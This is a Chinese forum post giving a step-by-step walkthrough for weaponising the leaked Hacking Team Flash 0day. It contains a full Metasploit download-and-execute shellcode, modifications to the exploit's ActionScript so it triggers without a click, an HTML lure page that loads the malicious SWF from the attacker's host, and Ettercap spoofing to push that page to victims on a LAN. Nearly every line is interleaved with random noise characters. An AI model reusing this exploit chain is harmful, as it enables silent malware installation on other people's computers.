|
. G3 Q8 @" J! ^$ g: L
三、flash 0day之手工代码修改制作下载者实例入侵演示 , [) k0 k! o- Y: [5 S
/ J8 J9 R5 J* H2 @" M
' a l5 I U7 G% S- _# j/ f6 i
利用到的工具: % J4 ]) W& e4 V8 J; b% D$ B% e
. _% `" J( d: D7 c# ]1 z
# y" V3 [4 x7 h+ ?0 ~- {2 _
Msf
: i* h# }# L: S( a. s# V ; ?8 W% `+ r2 _4 v; R* t
" z, \/ @# s7 m Ettercap
2 y1 N A4 L0 N# @! u; W9 a% l 6 x# L, }( @- L3 t9 u1 {* w
: F" w1 Y9 z( Z. N% `3 y/ q Adobe Flash CS6 5 V: x6 I# O% z0 g, X6 S
6 T" E, a, n$ I" s# d+ @
- v& ] V( v4 R/ j
Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
: ^, O" _1 ?! N: Z {$ N & s# C! d* q9 t
9 o- a! r$ K: W- u6 ]- x 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options , L& d& o: K! g7 `- U2 L
0 a1 N( |: j- l A
3 o' [5 ~: [5 {% z+ c9 u
如图:
6 G4 O% e. ?! C& F% x
. F% O; Z* O2 d5 H H9 [' i- Q& W! }* p6 @
( }7 l+ @1 d Y% w
/ S1 t, s. i1 ~+ N$ V$ S7 o- v) ?6 ]+ z5 K; i( J- Z+ ~
 3 U- y- D% ?. r7 W0 L/ _2 U
' } p6 ^7 y$ V- e: k6 Q' X
! k4 O' z! K! a) ]3 X" j 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: f, E" l& Q% f2 T" O
1 n6 h3 J( h' N# A% ?& ^! a. C; F& Z* L
" y5 u, t0 `+ u6 T0 l- ^
' U7 R7 H1 c+ O9 E: Z) }9 n, M6 a, |( O, k" Q( P
 2 t& J6 m$ W5 ~* L- f1 D
1 o* w% {' P H5 a7 ^
) J/ H# f2 n; y 然后执行generate -t dword生成shellcode,如下:
) p9 P& D$ Y: q
* ?1 n; L% q. L3 V x- t9 y ]; |, H# b, _( z5 }# Z
3 S' Y2 C4 P0 D& A ; [5 p7 o2 @4 ?' ?. c: b
% ` `: W: A$ ^8 D
复制代码到文本下便于我们一会编辑flash exp,如下:
6 T2 j5 R. O; _9 O1 C4 S) p
. y0 S r6 |* p! b% P+ g! b' [7 S# j3 D1 m- n+ T
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, . u+ X( D6 J. O& y- Q
1 _0 |* H7 b! n
9 [0 g+ R3 |0 F0 F) { 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, : }, V: W+ H; ]7 Z" R3 X
/ Y; Q/ `" O V3 k" ^
8 W% r% f% a! _' e9 T' c5 I- s4 C/ c 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, 7 g" I' i. J" f# \4 J6 F- Q X$ R
7 {# w3 _' Z/ M* @, J1 x+ r. U D
+ L7 Z9 _" l+ c" T3 [8 L% i- N 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
& M7 D- k) O) [6 ^% l" {$ s
- W" z1 h. ]$ g: y% p
5 d' T \3 u5 ?* V, V! o6 f 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, ! N7 Y) ~, c( B0 Y, a
' g5 C' f, Y+ T: Y) Q
1 d: m T N8 T) ]5 `3 H3 E 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
" M7 }. w4 c& V% `" _( Q, e
. M3 l: R% q9 P: P+ Y! g! O: L0 X+ T5 z0 c7 U
0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 9 E1 o( R) u7 T6 t
( R0 Z/ f' Q8 X& T8 A0 A0 L
+ ~6 }7 L1 C; L4 X 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, - j5 x( x: o* K! C5 I
2 A( l: s" E7 e- r, j
! d/ b* t6 _9 ^4 r, o8 Z6 O 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff,
* m5 n- q. U( ?5 r( X, X' m : c x, a( B7 S4 S4 r
2 o- h) w0 m0 y) I 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, ) `* ~' y8 O1 F u6 N
: T( ^ T: X9 F- r2 c0 C
9 n, a1 y' g( R# ]8 y) m 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
" L# W& \# W" R9 X1 S/ c
- F* k. W9 |; J
& M& l2 H3 z: U) Y 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, 7 Z& w! i1 P, g
* ]/ s# l8 F4 W" o0 D
7 {5 d* a$ V' k 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
3 H7 X, g7 {. r" w' l' N
3 o. `5 @% x8 ~4 _6 H$ f
+ l A* }# i$ l 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 % ~$ P+ m6 @5 H. F) N/ G8 J: [3 F( [
( I: B& X( n/ [6 n0 R+ ?, q' v9 [& S# B6 ^# O" m) V$ _
) ~( [) q1 s+ U8 |
' v, c# I7 ?. v/ \
8 b( o) }+ l1 s5 C3 M0 f$ V2 z- F , x7 I' B/ f0 c! [* A# o
+ ]: H- U$ q; u7 S
8 K* J: K: R# _
下面我们来修改flash 0day exp,需要修改三个文件,分别为: 2 ]2 J6 T4 v4 B
- M5 U( r% ~% d3 X& c8 h& ?) H" v
* m7 O w# V+ n% ? 
$ ~* t" x3 m* V5 t/ k / R+ q- \' W$ h4 b7 \
- Y/ H7 ~ o% m1 e5 U 先修改ShellWin32.as,部分源代码如图: + y3 c# z* e, \; S" A
! C1 B% q* q6 u7 w( P
9 D6 ~ ]. o, S5 v {4 q! M1 h. M
 / |" ?& s% F7 E1 [# i+ _
0 o* \. E, p' \+ h( y! C' H" H& J0 [5 |8 O
我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 0 P! w' ?0 o0 ]: h/ K
$ f/ b0 P+ K8 u! b
/ Y% [1 `( W! F8 B% a5 n0 Q1 ]. K
 C) V) ~1 m8 C
8 }, s) E5 g4 m7 e
: s0 k/ n7 C# K/ t" F6 J& I 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: 2 Q. T1 x( P# X: v) V
c& {) [( ]& w/ s6 _3 w$ E+ l* v- p# _' |" P B4 A5 k( r
" y7 P$ a# Z, W% N 0 @4 U5 K; b2 e! t: V6 f. R/ @4 _1 n
5 j0 J; F2 h4 A/ i2 m; g; @
换行在后面加一句TryExpl();注意是l不是数字1,然后如图: + ^. O/ w" A* t+ v- |! P$ Y
( i# B3 U! A8 g' }* c8 g- A* x4 s6 B; ^9 `/ f6 s
8 ?" Y3 X8 f2 i0 j
. U2 v1 H' i& E
* \! C8 H+ C: g0 a & ~: U9 [0 }7 B- a& F
" W4 k$ Q* C# W4 O' L) L
8 y* ]" \" u" E# Z 
- F; r! A! S' L. t- r$ [ % @8 Z" @* B) K1 C1 v) [1 t% q
0 n0 K1 M* Y0 N6 E 然后点保存,下面我们来编译一下,打开 ) `4 P2 }; q0 K7 L
5 }( S+ D6 x$ J( |! s; X
1 X4 F( N% ]1 t, ~ exp1.fla然后点文件-发布,看看编译没错误
" [& C+ b" N4 r- l
8 l; K$ f* R6 h) Z; x/ P
3 s2 |/ _( E) d, X; x/ c' X ; A3 J: {6 y" k I! d A/ C
7 [! U/ a# _. u
' o+ i. k7 a6 L8 A8 i. C
2 s2 b) B& o% { }- g " B! y* M5 x& r) C$ R4 F
" f+ P+ d4 u7 d* m% G% T3 O
$ t- `: x6 G. _
- ^0 f4 ~/ v( I6 [4 E
3 @1 V5 ]9 @7 U4 ^2 Z  $ ]+ i9 s' {% l2 P- R
, Z/ l9 A+ [: q) P
6 j$ ?. `/ }# G) m3 J. L3 m
然后我们把生成的
6 |, Y8 P- I6 L5 K3 m: P
6 j$ ]7 ?8 i l; h6 e2 o2 K9 t; ]+ a- q6 M. R6 h
exp1.swf丢到kailinux 的/var/www/html下: ' P1 e# K3 Q! z! E
* Q* l7 N. D8 J* d+ ^" N' H6 C
# b8 M! S. F$ }& `, ~! Y# @ 然后把这段代码好好编辑一下 5 |0 s# a$ b( a3 ~. C7 R% X
% O; {( ^$ R# i7 |+ `( v
; o' ?6 ]4 B5 U0 Z
3 W2 d! v+ d8 D* E6 N
+ `" n8 D: ? L4 X& D y
; J$ W! y1 V- K0 m 7 l) E2 u. W6 x' h
! J- L. `+ H" ^* P: [& E7 V! f8 X) ?
7 f' r9 D: m5 i
, |+ Y& i9 C6 R( n2 E/ n# N. U! d
0 B% M7 s+ e5 p6 y4 f9 c3 b5 r; C
' h5 i6 \: R5 i3 F% b5 j 5 e( A/ t/ _4 K( [7 c
# y. Y2 U9 d- l" a1 `
! S; H/ W6 h8 Q9 d! z( u) C( H
! g7 `5 _' m( I7 f# O& e4 F; _! `( O7 W
$ g6 z, s% N7 c* D
3 F; Y! E, _9 M% Z1 d' b! U
4 @6 h, f# b1 G _+ ~: b2 ] <!DOCTYPE html> 7 _9 V" [% Y9 F* n6 L- q
) G4 q3 Y" x2 @1 v0 C2 F5 K9 n4 ^, }! D, Q
<html> 7 w4 j/ L3 N6 T
! z. u8 C' @" D3 f4 t
0 n; e" s5 e/ p3 }" M% d$ @ <head>
8 L6 t; @, H) x% s
+ _* M/ j. t2 R) \$ u' O- Y
( t/ R( n& o# A# g+ U <meta http-equiv="Content-Type" content="text/html; 9 W" D) P6 G& e7 M m1 I
& ?" e; G$ y, q- I
" {! d. B/ e2 [, I2 q0 L# O charset=utf-8"/>
# \: M' K2 ^1 E& [9 C
% K) r, ~3 s8 d: d
6 M8 j3 \, S1 G: ] </head> 3 L& ?3 ~7 I M' o; b
6 v9 g9 L- G# {' ]( p5 X# c
3 d; C/ E6 A! J. y) x: [* s0 _ <body>
/ a% S% W" ?& A) Y8 Y " R( G. N& ~+ }9 f1 V7 o! W% n
' B- D4 n) J! P2 C3 I
<h2> Please wait, the requested page is loading...</h2>
& z3 Q3 l0 a) N ' s+ T0 N/ z6 j& P2 V
; O8 i3 }4 y$ u7 e. w7 v+ L <br>
/ y2 p6 F# x' M8 Y
: N6 y+ d; F3 }/ A8 h& f+ \- w4 A2 l: a. T
<OBJECT
. P4 z& x6 J! t3 E5 x3 t ! S+ F* w( \0 j* V
# \( e; \3 a' m- n- q O3 G& D classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie
: t) w; n" w% } 1 H: `" l2 D- n
1 b6 q C$ A8 S/ ?
VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
) Z8 u1 A, U; T5 Z 0 {% q. F5 C; [& M: y1 T
) V* R8 y9 \! g1 }
</body>
; D' Q' i9 B D5 N1 @" v8 n& C
8 w9 n$ T [( I( r
8 H; N& @5 N2 N# w0 P7 \) T <script>
- l5 }; q. R' ?% r' p) j 0 J) G i! m+ F) x; |
' i* V% S3 D; X# g& P; m* s
setTimeout(function () {
- z2 M! r% J6 H: Q0 a H 9 P) X8 Y5 _- S) P6 W' Q
) q, I+ }' r1 N7 M
1 R: L# T" t6 R! _
7 }! `4 ]# R) Y! q& x; i& k
1 {( e4 H2 k/ k6 p) L9 O
window.location.reload();
, h5 l% s$ k. f6 [8 \ 8 ~$ Y8 }) A5 l% H2 i
3 U/ r: m7 }0 i+ o: l# T/ O
}, 10000);
7 O+ S! O a5 A
- P2 V; m! G' C- H5 O* J2 O2 M; ~) k% p4 Z% O
0 ^4 f1 l* j2 r7 t ( {# h) T+ a$ {% @
3 P3 j) e. h0 ^! b) t, C( C </script> 2 t* a p% M* d! c. b) H
+ D. k! s. H5 G' }8 b" J" y% F0 ~
</html> & Q# r' t7 _$ F, e7 B+ U+ U
, @- E8 G" ]5 {) Q
- b6 x+ T, g$ ] l! ^2 [
5 b+ f* Y! g$ i' x' q0 S
# ], S- z' S+ N0 f( J8 u2 l* q( A( Q0 \+ B4 ^" F" V
注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
8 `6 R: k4 P+ F. F" i& M+ _! I* G
3 f1 M, w3 P9 I
( \* S4 V, y0 Z7 m" m3 ~ 
# L: C3 U+ h! A6 b+ i( d2 v 1 B1 ~3 U8 G8 j/ {8 \
& H# b3 r4 G! M3 m' T# j" F/ P! K
$ |( U# d8 _% ^ @5 I/ P
9 {2 R# c j7 S1 {) X! c
, G3 s2 j$ U6 _1 ~6 G% J5 Y
* V4 A/ X1 u6 t3 D3 t6 i6 o# `" v! W# l
! s0 w2 M. V" [( C
o! I# |# u# p& L$ f1 J0 w! f. m
; S$ A) E1 ]& R9 {* I
+ E3 L& _3 K, [7 s5 D' [8 O% F' o& p2 {3 `, {/ p- ]
n8 U# L/ |& A2 X6 b % H/ s' Y% l' }5 F+ Y
Y6 L1 N9 z9 A
下面我们用ettercap欺骗如图:
4 ^; l( _, F8 C2 g 4 p/ X! ^0 H9 ^9 B2 u: [
. x, G. ^7 Z" ~1 Q4 t2 m8 j2 N6 \
 # O' C. }. i" x- q9 X& m3 m
# m# a3 Z# u4 V! ~9 f: v* s; D
3 c1 |4 o1 _, N5 a4 e7 h , i7 k% Z4 C) a4 D6 y$ C4 o; f
5 v) z8 f. Z5 G G' a, ^, Q
) E9 S8 ]" O. n4 I$ A! u% V, K 下面我们随便访问个网站看看: 0 |/ O6 }9 V; I# F
. d! I2 m8 u" `: F m6 K
4 B6 k- [% m% w7 g; m) @
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图:
3 q2 n) G* A1 r6 p, r, W
9 z9 ^) K( n; ~$ [5 q3 ^
+ `4 o9 b0 s: I* J# d# ?; P& H" b 
+ F( l% {0 x& W# Q9 {+ Z + L& S5 @3 ] k% ?
8 Z+ y" H+ b. ^
我们看另一台,
8 B7 N4 N6 W. r/ G
% a9 k$ T# R0 P% i3 s8 U w+ y* \" x
提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。 ; A$ W' q. n m2 }
| 
发表于 2018-10-20 20:28:55
收藏
支持
反对